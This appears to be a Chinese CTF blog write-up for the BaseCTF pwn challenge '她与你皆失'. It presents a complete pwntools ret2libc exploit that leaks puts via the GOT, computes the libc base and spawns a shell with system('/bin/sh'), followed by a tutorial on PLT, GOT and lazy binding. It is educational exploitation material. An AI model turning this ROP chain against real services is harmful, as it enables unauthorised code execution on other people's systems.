<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" integrity="sha256-dABdfBfUoC8vJUBOwGVdm8L9qlMWaHTIfXt+7GnZCIo=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"maple-pwn.github.io","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.23.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="Basectf pwn方向“她与你皆失”by Maple ret2libc,新手上路的第一块绊脚石，这道题是很标准的两步走，先泄露libc再getshell 1234567891011121314151617181920212223242526272829303132from pwn import *context(os &#x3D; &#x27;linux&#x27;,arch &#x3D; &#x27;amd64">
<meta property="og:type" content="article">
<meta property="og:title" content="Maple">
<meta property="og:url" content="http://maple-pwn.github.io/2025/04/04/basectf/5th_%E5%A5%B9%E4%B8%8E%E4%BD%A0%E7%9A%86%E5%A4%B1/tynjs/tynjs/index.html">
<meta property="og:site_name" content="Maple">
<meta property="og:description" content="Basectf pwn方向“她与你皆失”by Maple ret2libc,新手上路的第一块绊脚石，这道题是很标准的两步走，先泄露libc再getshell 1234567891011121314151617181920212223242526272829303132from pwn import *context(os &#x3D; &#x27;linux&#x27;,arch &#x3D; &#x27;amd64">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://maple-pwn.github.io/image.png">
<meta property="og:image" content="http://maple-pwn.github.io/image-1.png">
<meta property="og:image" content="http://maple-pwn.github.io/image-2.png">
<meta property="og:image" content="http://maple-pwn.github.io/image-3.png">
<meta property="og:image" content="http://maple-pwn.github.io/image-4.png">
<meta property="article:published_time" content="2025-04-03T17:34:36.681Z">
<meta property="article:modified_time" content="2025-02-11T08:37:22.489Z">
<meta property="article:author" content="Maple">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://maple-pwn.github.io/image.png">


<link rel="canonical" href="http://maple-pwn.github.io/2025/04/04/basectf/5th_%E5%A5%B9%E4%B8%8E%E4%BD%A0%E7%9A%86%E5%A4%B1/tynjs/tynjs/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://maple-pwn.github.io/2025/04/04/basectf/5th_%E5%A5%B9%E4%B8%8E%E4%BD%A0%E7%9A%86%E5%A4%B1/tynjs/tynjs/","path":"2025/04/04/basectf/5th_她与你皆失/tynjs/tynjs/","title":""}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title> | Maple</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  






  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Maple</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">Maple’s Blog</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>







</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Basectf-pwn%E6%96%B9%E5%90%91%E2%80%9C%E5%A5%B9%E4%B8%8E%E4%BD%A0%E7%9A%86%E5%A4%B1%E2%80%9D"><span class="nav-number">1.</span> <span class="nav-text">Basectf pwn方向“她与你皆失”</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8A%A0%E8%BD%BD%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%96%87%E4%BB%B6%E5%92%8C%E5%8A%A8%E6%80%81%E9%93%BE%E6%8E%A5%E5%BA%93"><span class="nav-number">1.1.</span> <span class="nav-text">加载二进制文件和动态链接库</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%8E%B7%E5%8F%96%E5%9C%B0%E5%9D%80"><span class="nav-number">1.2.</span> <span class="nav-text">获取地址</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9E%84%E9%80%A0payload1"><span class="nav-number">1.3.</span> <span class="nav-text">构造payload1</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%8E%B7%E5%8F%96puts%E7%9A%84%E5%AE%9E%E9%99%85%E5%9C%B0%E5%9D%80%EF%BC%8C%E5%B9%B6%E8%AE%A1%E7%AE%97libc%E5%9F%BA%E5%9D%80"><span class="nav-number">1.4.</span> <span class="nav-text">获取puts的实际地址，并计算libc基址</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9E%84%E9%80%A0payload2%EF%BC%8Cgetshell"><span class="nav-number">1.5.</span> <span class="nav-text">构造payload2，getshell</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ret2libc%E5%8E%9F%E7%90%86%E4%BB%8B%E7%BB%8D"><span class="nav-number">1.6.</span> <span class="nav-text">ret2libc原理介绍</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#PLT%E8%A1%A8%E5%92%8CGOT%E8%A1%A8"><span class="nav-number">1.6.1.</span> <span class="nav-text">PLT表和GOT表</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%BB%B6%E8%BF%9F%E7%BB%91%E5%AE%9A"><span class="nav-number">1.6.2.</span> <span class="nav-text">延迟绑定</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B0%8F%E7%BB%93"><span class="nav-number">1.6.3.</span> <span class="nav-text">小结</span></a></li></ol></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Maple</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">44</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://maple-pwn.github.io/2025/04/04/basectf/5th_%E5%A5%B9%E4%B8%8E%E4%BD%A0%E7%9A%86%E5%A4%B1/tynjs/tynjs/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Maple">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Maple">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content=" | Maple">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2025-04-04 01:34:36" itemprop="dateCreated datePublished" datetime="2025-04-04T01:34:36+08:00">2025-04-04</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2025-02-11 16:37:22" itemprop="dateModified" datetime="2025-02-11T16:37:22+08:00">2025-02-11</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="Basectf-pwn方向“她与你皆失”"><a href="#Basectf-pwn方向“她与你皆失”" class="headerlink" title="Basectf pwn方向“她与你皆失”"></a>Basectf pwn方向“她与你皆失”</h1><p>by Maple</p>
<p><code>ret2libc</code>,新手上路的第一块绊脚石，这道题是很标准的两步走，先泄露libc再getshell</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(os = <span class="string">&#x27;linux&#x27;</span>,arch = <span class="string">&#x27;amd64&#x27;</span>,log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;libc.so.6&#x27;</span>)</span><br><span class="line">p = process(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">elf = ELF(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line"></span><br><span class="line">main_addr = elf.symbols[<span class="string">&#x27;main&#x27;</span>]</span><br><span class="line">puts_plt = elf.plt[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">puts_got = elf.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">pop_rdi = <span class="number">0x401176</span></span><br><span class="line">ret = <span class="number">0x40101a</span></span><br><span class="line"></span><br><span class="line">p.recv()</span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*(<span class="number">0xa</span>+<span class="number">8</span>)</span><br><span class="line">payload+=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)</span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">puts_addr = u64(p.recvuntil(<span class="string">&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(puts_addr))</span><br><span class="line"></span><br><span class="line">libc_base = puts_addr-libc.sym[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(libc_base))</span><br><span class="line"></span><br><span class="line">system = libc_base+libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">binsh = libc_base+<span class="built_in">next</span>(libc.search(<span class="string">b&#x27;/bin/sh&#x27;</span>))</span><br><span class="line"></span><br><span class="line">payload2 = <span class="string">b&#x27;a&#x27;</span>*(<span class="number">0xa</span>+<span class="number">8</span>)</span><br><span class="line">payload2+=p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)</span><br><span class="line"></span><br><span class="line">p.sendline(payload2)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="加载二进制文件和动态链接库"><a href="#加载二进制文件和动态链接库" class="headerlink" title="加载二进制文件和动态链接库"></a>加载二进制文件和动态链接库</h2><p><code>libc = ELF(&#39;libc.so.6&#39;)</code>这一段是用来加载动态链接库libc.so.6，用于后续获取libc函数的地址</p>
<p><code>elf = ELF(&#39;./pwn&#39;)</code>用来加载本地的二进制文件，用于获取程序中的地址信息</p>
<h2 id="获取地址"><a href="#获取地址" class="headerlink" title="获取地址"></a>获取地址</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">main_addr = elf.symbols[<span class="string">&#x27;main&#x27;</span>]</span><br><span class="line">puts_plt = elf.plt[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">puts_got = elf.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">pop_rdi = <span class="number">0x401176</span></span><br><span class="line">ret = <span class="number">0x40101a</span></span><br></pre></td></tr></table></figure>

<p>这里获取了puts函数在PLT(程序链接表)和GOT(全局偏移表)的地址，后面泄露用</p>
<h2 id="构造payload1"><a href="#构造payload1" class="headerlink" title="构造payload1"></a>构造payload1</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*(<span class="number">0xa</span>+<span class="number">8</span>)</span><br><span class="line">payload+=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)</span><br><span class="line">p.sendline(payload)</span><br></pre></td></tr></table></figure>

<p>首先溢出覆盖溢出点之前的内存区域，直到返回地址的位置。</p>
<p>接着<code>pop_rdi</code>+<code>puts_GOT</code>，将puts函数在GOT表中的地址弹入rdi。</p>
<p>通过<code>puts_plt</code>调用puts函数，打印出rdi寄存器中此时的值，也就是puts函数在GOT表中的实际位置</p>
<p>泄露完成后，返回main函数，等待下一次payload</p>
<h2 id="获取puts的实际地址，并计算libc基址"><a href="#获取puts的实际地址，并计算libc基址" class="headerlink" title="获取puts的实际地址，并计算libc基址"></a>获取puts的实际地址，并计算libc基址</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">puts_addr = u64(p.recvuntil(<span class="string">&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(puts_addr))</span><br><span class="line">libc_base = puts_addr-libc.sym[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(libc_base))</span><br></pre></td></tr></table></figure>

<ul>
<li><code>u64(p.recvuntil(&#39;\x7f&#39;)[-6:].ljust(8,b&#39;\x00&#39;))</code><ul>
<li><code>recvuntil(&#39;\x7f)</code>为接收输出直到遇到第一个<code>\x7f</code>字节，</li>
<li><code>[-6:]</code>为取最后6个字节</li>
<li><code>ljust(8,b&#39;\x00&#39;)</code>为将字节串填充到8个字节</li>
<li><code>u64</code>将字节串转换为64位无符号整数</li>
</ul>
</li>
<li><code>print(hex(puts_addr))</code><ul>
<li>将<code>puts</code>函数的真正地址打印出来（其实不加这一步也没事）</li>
</ul>
</li>
<li><code>libc_base = puts_addr-libc.sym[&#39;puts&#39;]</code><ul>
<li>这里是计算libc库的基地址，因为libc.sym[‘puts’]是<code>puts</code>函数在libc中的偏移地址，所以这样可以得到基地址，为后面构造payload2准备</li>
</ul>
</li>
</ul>
<h2 id="构造payload2，getshell"><a href="#构造payload2，getshell" class="headerlink" title="构造payload2，getshell"></a>构造payload2，getshell</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">system = libc_base+libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">binsh = libc_base+<span class="built_in">next</span>(libc.search(<span class="string">b&#x27;/bin/sh&#x27;</span>))</span><br><span class="line">payload2 = <span class="string">b&#x27;a&#x27;</span>*(<span class="number">0xa</span>+<span class="number">8</span>)</span><br><span class="line">payload2+=p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)</span><br><span class="line">p.sendline(payload2)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<ul>
<li><code>binsh = libc_base+next(libc.search(b&#39;/bin/sh&#39;))</code><ul>
<li><code>libc.search(b&#39;/bin/sh&#39;)</code>为一个生成器，用于在libc库中搜索包含&#x2F;bin&#x2F;sh字符串的所有地址，而<code>b&#39;/bin/sh</code>意为是一个字节串</li>
<li><code>next(libc.search(b&#39;/bin/sh&#39;))</code>即调用next函数获取生成器的下一个值，简单来说，在这里就是从生成器里获取第一个匹配的地址</li>
</ul>
</li>
</ul>
<h2 id="ret2libc原理介绍"><a href="#ret2libc原理介绍" class="headerlink" title="ret2libc原理介绍"></a>ret2libc原理介绍</h2><p>我的理解也不是很深刻，如有错误请多多包涵</p>
<p>参考博客：<a target="_blank" rel="noopener" href="https://www.yuque.com/hxfqg9/bin/ug9gx5#">PLT&amp;GOT</a></p>
<h3 id="PLT表和GOT表"><a href="#PLT表和GOT表" class="headerlink" title="PLT表和GOT表"></a>PLT表和GOT表</h3><p>GOT(Globle offset table)全局偏移量表，位于数据段，是一个每个条目事8字节地址的数组，用来存储外部函数在内存的确切地址</p>
<p>PLT(Procedure linkage table)过程连接表，位于代码段，是一个每个条目事16字节内容的数组，使得代码能够方便的访问共享的函数或者变量</p>
<p>可以一起做一个实验,编写如下源码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="type">void</span> <span class="title function_">print_banner</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;Welcome to World of PLT and GOT\n&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line">&#123;</span><br><span class="line">        print_banner();</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>依次执行编译命令：</p>
<p><code>gcc -Wall -g -o test.o -c test.c -m32</code></p>
<p><code>gcc -o test test.o -m32</code></p>
<p>这时我们的测试文件夹中有了test.c、test.o和可执行文件test</p>
<p>通过<code>objdump -d test.o</code>查看反汇编</p>
<p><img src="/image.png" alt="alt text"></p>
<p>可以看到在<code>print_banner</code>中存在<code>7:   e8 fc ff ff ff          call   8 &lt;print_banner+0x8&gt;</code>这样一行</p>
<p>printf()和函数实在glic动态库里面的，只有当程序运行起来的时候才可以确定地址（延迟绑定技术），所以此时的printf（）函数先用fc ff ff ff 也就是有符号的-4来代替</p>
<p>运行时进行重定位时无法修改代码段的，只能将printf重定位到数据段，但是已经编译好的程序，调用printf的时候怎么才能找到这个地址呢？</p>
<p>链接器会额外生成一小段代码，通过这段代码来获取printf()的地址，进行链接的时候只需要对printf_stub()重定位就可以了</p>
<figure class="highlight plaintext"><figcaption><span>Text</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">.text</span><br><span class="line">...</span><br><span class="line"></span><br><span class="line">// 调用printf的call指令</span><br><span class="line">call printf_stub</span><br><span class="line">...</span><br><span class="line">printf_stub:</span><br><span class="line">    mov rax, [printf函数的储存地址] // 获取printf重定位之后的地址</span><br><span class="line">    jmp rax // 跳过去执行printf函数</span><br><span class="line"></span><br><span class="line">.data</span><br><span class="line">...</span><br><span class="line">printf函数的储存地址,这里储存printf函数重定位后的地址</span><br></pre></td></tr></table></figure>

<p>总之，动态链接每个函数需要两个东西：</p>
<ul>
<li>用来存放外部函数地址的数据段</li>
<li>用来获取数据段记录的外部函数地址的代码</li>
</ul>
<p>这里就出现了我们提及的两个表GOT（存放外部函数地址）和PLT（存放额外代码）</p>
<p><img src="/image-1.png" alt="alt text"></p>
<p>可执行文件里面保存的时PLT表对应的地址，对那个PLT地址指向的是GOT的地址，GOT表指向的就是glibc中的地址</p>
<p>那么我们可以发现，在这里面想要通过plt表获取函数的地址，首先要保证got表已经获取了正确的地址，但是在一开始就进行所有函数的重定位是比较麻烦的，为此，linux引入了延迟绑定机制</p>
<h3 id="延迟绑定"><a href="#延迟绑定" class="headerlink" title="延迟绑定"></a>延迟绑定</h3><p>只有动态库函数在被调用时，才会进行地址解析和重定位功能工作，为此可以使用类似这样的代码来实现：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//一开始没有重定位的时候将 printf@got 填成 lookup_printf 的地址</span></span><br><span class="line"><span class="type">void</span> <span class="built_in">printf</span>@plt()</span><br><span class="line">&#123;</span><br><span class="line">address_good:</span><br><span class="line">    jmp *<span class="built_in">printf</span>@got   </span><br><span class="line">lookup_printf:</span><br><span class="line">    <span class="comment">//调用重定位函数查找 printf 地址，并写到 printf@got</span></span><br><span class="line">    <span class="keyword">goto</span> address_good;<span class="comment">//再返回去执行address_good</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这段代码一开始的时候，printf@got是lookup_printf函数的地址，这个函数的作用是找寻printf()的地址，然后写入printf@got，lookup_printf执行完成后会返回到address_good，这样再jmp的话就可以直接跳到printf来执行了</p>
<p>也就是说，如果不知道printf地址，就去找找;如果知道，那就直接jmp去printf</p>
<p>接下来看一下怎么找的</p>
<p><code>objdump -d test &gt; test.asm</code>,在test.asm中可以看到plt表中的三项指令</p>
<p><img src="/image-2.png" alt="alt text"></p>
<p>可以看到后面两个表项中，plt表的第一条都是直接跳转到对应的got表项，而got表项的内容可以gdb查看</p>
<p><img src="/image-3.png" alt="alt text"></p>
<p><em>发现不太清楚地址怎么计算出来的话可以先了解一下信息存储</em>.</p>
<p>之前说过，在还没有执行函数之前，printf@got的内容是lookup_printf函数的地址，这就是要去找的printf函数的地址了</p>
<p>接下来的是</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">push   $<span class="number">0x0</span> <span class="comment">//将数据压到栈上，作为要执行的函数的参数</span></span><br><span class="line">jmp    <span class="number">1030</span> &lt;_init+<span class="number">0x30</span>&gt;    <span class="comment">//去到了第一个表项里</span></span><br></pre></td></tr></table></figure>

<p>继续</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">00001030</span> &lt;__libc_start_main@plt<span class="number">-0x10</span>&gt;:</span><br><span class="line">push   <span class="number">0x4</span>(%ebx)    <span class="comment">//将数据压到栈上，作为后面函数的参数</span></span><br><span class="line">jmp    *<span class="number">0x8</span>(%ebx)   <span class="comment">//跳转到函数</span></span><br><span class="line">add    %al,(%eax)</span><br></pre></td></tr></table></figure>

<p>再查找下看看jmp去哪了</p>
<p><img src="/image-4.png" alt="alt text"></p>
<p>对应的函数是<code>_dl_runtime_resolve</code></p>
<h3 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h3><p>在想要调用的函数没有被调用过，想要调用他的时候，是按照这个过程来调用的</p>
<p>xxx@plt -&gt; xxx@got -&gt; xxx@plt -&gt; 公共@plt -&gt; _dl_runtime_resolve</p>
<p>到这里我们解决最后两个问题;</p>
<ul>
<li>dl_runtime_resolve 是怎么知道要查找 printf 函数的<ul>
<li>在xxx@plt中，我们在jmp之前push了一个参数，每个xxx@plt的push的操作数都不一样，那个参数就相当于函数的id，告诉了_dl_runtime_resolve要去找哪一个函数的地址</li>
<li>在elf文件中.rel.plt保存了重定位表的信息，使用<code>readelf -r test</code>命令可以查看test可执行文件中的重定位信息</li>
</ul>
</li>
<li>_dl_runtime_resolve找到printf函数地址之后，它怎么知道回填到哪个GOT表项<ul>
<li><p>看 .rel.plt 的位置就对应着 xxx@plt 里 jmp 的地址</p>
<p>在 i386 架构下，除了每个函数占用一个 GOT 表项外，GOT 表项还保留了３个公共表项，也即 got 的前３项，分别保存：<br>got [0]: 本 ELF 动态段 （.dynamic 段）的装载地址<br>got [1]：本 ELF 的 link_map 数据结构描述符地址<br>got [2]：_dl_runtime_resolve 函数的地址<br>动态链接器在加载完 ELF 之后，都会将这３地址写到 GOT 表的前３项</p>
</li>
</ul>
</li>
</ul>

    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/04/04/basectf/4th_shellcode_level0/shellcode_level0/" rel="prev" title="">
                  <i class="fa fa-angle-left"></i> 
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2025/04/04/basectf/6th_shellcode1/shellcode1/shellcode1/" rel="next" title="">
                   <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Maple</span>
  </div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
